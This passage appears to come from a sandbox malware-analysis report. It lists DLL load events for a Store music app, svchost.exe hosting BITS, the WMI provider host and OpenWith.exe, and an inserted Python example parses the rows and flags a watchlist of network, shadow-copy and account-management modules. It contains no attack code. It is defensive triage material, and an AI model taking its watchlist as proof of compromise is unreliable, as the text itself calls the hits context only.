              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: textshaping.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.applicationmodel.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: esent.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.storage.applicationdata.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: wldp.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: logoncli.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: mrmcorer.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.staterepositoryclient.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: profapi.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: appxdeploymentclient.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: cryptbase.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: bcp47mrm.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.ui.xaml.controls.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: execmodelproxy.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: rmclient.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: uiamanager.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.ui.core.textinput.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.ui.immersive.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: dataexchange.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: threadpoolwinrt.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.globalization.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.system.profile.retailinfo.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.media.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.applicationmodel.lockscreen.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: wincorlib.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: lockappbroker.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: msvcp110_win.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: powrprof.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: umpdc.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.graphics.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.ui.xaml.phone.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: twinapi.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.networking.connectivity.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.media.playback.mediaplayer.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: mfplat.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: rtworkq.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.media.mediacontrol.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfmediaengine.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.devices.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.playback.proxystub.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: comppkgsup.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: directmanipulation.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msftedit.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: globinputhost.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.web.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wpnapps.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.devices.enumeration.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: devdispitemprovider.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ddores.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: defaultdevicemanager.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wuceffects.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.networking.backgroundtransfer.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: profext.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: biwinrt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: photometadatahandler.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: microsoftaccountwamextension.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfcore.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: gnsdk_fp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mp3dmod.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll (2 consecutive loads)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll (2 consecutive loads)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
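The rows above are image-load events the sandbox recorded for processes that ran during the analysis (a Store app, a BITS-hosting svchost.exe, the WMI provider host, and OpenWith.exe). None of them is a verdict on its own; what an analyst does with such a list is group it by process, collapse repeated loads, and look for modules a given process has no ordinary reason to load. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own tooling: it parses rows in the form printed on this page (a few constructed sample rows are embedded, copied in the page's format but not the full list), collapses repeats, and flags modules from a small hand-picked watchlist. The watchlist and its descriptions are the editor's choice, not anything the report states.

```python
import re
from collections import Counter, OrderedDict

# Constructed sample rows in the form the report prints
# ("Source: <process>Section loaded: <module>", sometimes followed by the
# "Jump to behavior" link text). Not the full list from the page.
SAMPLE_ROWS = """\
Source: C:\\Windows\\System32\\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\\Windows\\System32\\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\\Windows\\System32\\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\\Windows\\System32\\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\\Windows\\System32\\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\\Windows\\System32\\wbem\\WmiPrvSE.exeSection loaded: mpclient.dll
Source: C:\\Windows\\System32\\OpenWith.exeSection loaded: d3d10warp.dll
Source: C:\\Windows\\System32\\OpenWith.exeSection loaded: d3d10warp.dll
Source: C:\\Windows\\System32\\OpenWith.exeSection loaded: d3d10warp.dll
"""

# The process path runs straight into "Section loaded:" in the extracted text,
# so anchor on the ".exe" suffix; the module name runs into the link text,
# so stop at the first ".dll".
ROW_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*Section loaded:\s*(?P<mod>\S+?\.dll)",
    re.IGNORECASE,
)

# Editor's watchlist (an assumption, not from the report): modules that
# deserve a second look when they appear in a process that does not
# normally need them. Descriptions say what the DLL is, not a verdict.
WATCHLIST = {
    "schannel.dll": "TLS (Schannel security package)",
    "winhttp.dll": "HTTP client (WinHTTP)",
    "wininet.dll": "HTTP client (WinINet)",
    "vssapi.dll": "Volume Shadow Copy API",
    "samcli.dll": "SAM client (local account management)",
    "samlib.dll": "SAM client library",
    "mpclient.dll": "Microsoft Defender client library",
}


def parse_rows(text):
    """Map each process path to a Counter of module -> number of loads.

    Processes and modules keep first-seen order; rows that do not match
    the expected shape are skipped rather than guessed at.
    """
    loads = OrderedDict()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        counter = loads.setdefault(m.group("proc"), Counter())
        counter[m.group("mod").lower()] += 1
    return loads


def collapse(counter):
    """Return [(module, count)] so repeated loads become one entry with a count."""
    return list(counter.items())


def flag(loads):
    """Return [(process basename, module, description)] for watchlisted modules."""
    hits = []
    for proc, mods in loads.items():
        base = proc.rsplit("\\", 1)[-1]
        for mod in mods:
            if mod in WATCHLIST:
                hits.append((base, mod, WATCHLIST[mod]))
    return hits


if __name__ == "__main__":
    loads = parse_rows(SAMPLE_ROWS)
    for proc, mods in loads.items():
        print(proc)
        for mod, n in collapse(mods):
            print(f"    {mod}" + (f"  (x{n})" if n > 1 else ""))
    print("watchlist hits:")
    for base, mod, desc in flag(loads):
        print(f"    {base}: {mod}  [{desc}]")
```

The hits are context, not a finding. An svchost.exe that hosts BITS (qmgr.dll and bitsperf.dll are loaded in the rows above) loading winhttp.dll and schannel.dll is doing its normal job, and mpclient.dll is Microsoft Defender's client library, so the WMI provider host loading it is worth correlating with the WMI antivirus check in this report's signature list rather than treating as suspicious by itself. The useful baseline is a clean run of the same sandbox image: diff each process's module set against that run and investigate only what is new.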
              Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
